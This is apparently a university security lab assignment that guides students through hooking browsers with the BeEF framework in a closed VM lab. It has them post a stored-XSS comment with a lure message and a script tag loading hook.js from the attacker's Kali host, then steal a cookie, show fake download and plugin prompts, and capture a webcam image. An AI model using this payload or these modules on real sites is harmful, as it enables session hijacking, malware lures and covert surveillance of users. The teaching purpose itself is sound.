Project 16: BeEF (15 pts.)

What You Need

Purpose

BeEF exploits XSS vulnerabilities to inject javascript into a browser, and after that it can do a lot of nasty things to the target. It's got a lot of attacks, and only a few of them work on each target system. I chose a few fun ones that work in our environment.

Network Settings

Start both your Windows 2008 and Kali virtual machines.

Place both machines in NAT networking mode.

Ping your Kali mache from the Windows machine and make sure you get replies.

Use ifconfig to find the IP address of your Kali machine and make a note of it.

Starting BeEF on your Kali Machine

In your Kali 2 machine, at the left of the desktop, click the BeEF icon, as shown below.

A Terminal window launches, showing how to add the hook to a Web page, and then it crashes with a CRITICAL error message. Just ignore the critical error and wait a few seconds.

IceWeasel opens to the BeEF login page. Log in with a username of beef and a password of beef, as shown below.

BeEF's control panel opens, as shown below.

Currently there are no "Online Browsers" that you control.

(My BeEF shows some offline browsers from earlier runs; yours probably will not.)

Poisoning a Website

Now all you need is a website with an XSS vulnerability to poison.

We'll use a vulnerable messageboard app on my Games server.

In Kali Linux, open a new IceWeasel tab and go to:

https://games.samsclass.info/vulnphp

Log in with your name.

On the "Vulnerable Message Board" page, click the "Erase Comments" button.

Type in this message in the Comment: field, replacing the IP address with the IP address of your Kali machine, and replacing YOURNAME with your own name:

Leave this window open to win a FREE Tesla from YOURNAME!

<script src="http://172.16.1.132:3000/hook.js"></script>

Click the "Post Comment" button.

The message appears, without the script tags, as shown below.

In Kali, in IceWeasel, click the "BeEF Control Panel" tab.

Opening the Poisoned Message Board on the Target Machine

On your Windows 2008 Server machine, open Internet Explorer and go to:

https://games.samsclass.info/vulnphp/vuln-comments.html

A "Security Information" box pops up, warning you that there are both secure and insecure elements on this page (there sure are!). Click Yes.

On your Windows 2008 Server machine, open Chrome and go to the same URL.

On your Kali machine, in IceWeasel, on the "BeEF Control Panel" tab, you see only "Online Browser" with an Internet Explorer icon, as shown below. Chrome isn't falling for this trick.

On your Windows 2008 Server machine, in Chrome, go to this URL instead:

http://attack.samsclass.info/vulnphp/vuln-comments.html

This is the same page, but without HTTPS security.

After a few seconds, BeEF shows two online browsers, as shown below.

Exploiting IE: Stealing a Cookie with BeEF

On your Kali machine, in IceWeasel, in the "BeEF Control Panel", on the left side, click the "Online Browser" item beginning with the blue Internet Explorer logo.

In the right pane, click the Commands tab.

In the "Module Tree" section, expand the Browser folder.

Expand the "Hooked Domain" folder, as shown below.

Notice the colored buttons on the modules. Here's what the colors mean, although they aren't necessarily accurate:

Click the "Get Cookie" module.

The rightmost pane describes the module, as shown below.

At the lower right, click the Execute button.

In the "Module Results History" pane, click the "command 1" line.

The cookie value appears, as shown below.

If this were a site the user had logged in to, like a social networking site, you'd have that user's session cookie, and most likely be able to enter that person's account now.

Saving the Screen Image

Make sure the cookie value is visible.

Save a whole-desktop screen capture with a filename of "Proj 16a from YOUR NAME".

Exploiting IE: Clippy

On your Kali machine, in IceWeasel, in the "BeEF Control Panel", in the "Module Tree" section, scroll to the bottom. Expand the "Social Engineering" folder.

Click Clippy as shown below.

At the lower right, click the Execute button.

In your Windows 2008 machine, in Internet Explorer, Clippy appears, prompting you to download a file, as shown below. Clippy will continue to remind you every 5 seconds until you do it.

Saving the Screen Image

Make sure the Clippy is visible.

Save a whole-desktop screen capture with a filename of "Proj 16b from YOUR NAME".

Exploiting Chrome: Fake Notification Bar

On your Kali machine, in IceWeasel, in the "BeEF Control Panel", on the left side, click the "Online Browser" item beginning with a question mark.

In the right pane, click the Commands tab.

In the "Module Tree" section, scroll to the bottom. Expand the "Social Engineering" folder.

Click "Fake Notification Bar (Chrome)" as shown below.

At the lower right, click the Execute button.

In your Windows 2008 machine, in Chrome, an "Additional plugins are required..." message appears, as shown below.

Saving the Screen Image

Make sure the "Additional plugins are required..." message is visible.

Save a whole-desktop screen capture with a filename of "Proj 16c from YOUR NAME".

Exploiting Chrome: Using the Webcam (Optional)

If you are exploiting a VM without a webcam, skip this section.

However, I was able to connect my webcam to my virtual machine by upgrading the virtual hardware, so this worked!

In Beef, shrink the "Hooked Domain" folder. Scroll down to the "Webcam HTML5" item and click it, as shown below.

At the lower right, click the Execute button.

On your target Windows 2008 machine, in Chrome, a warning box appears, as shown below.

Click Allow.

On Kali, in IceWeasel, In the "Module Results History" pane, click the "command 1" line.

The picture appears in the right pane, as shown below.

Turning In Your Project

Email the images to cnit.124@gmail.com with a subject of "Project 16 from YOUR NAME".


Posted 11-18-15 by Sam Bowne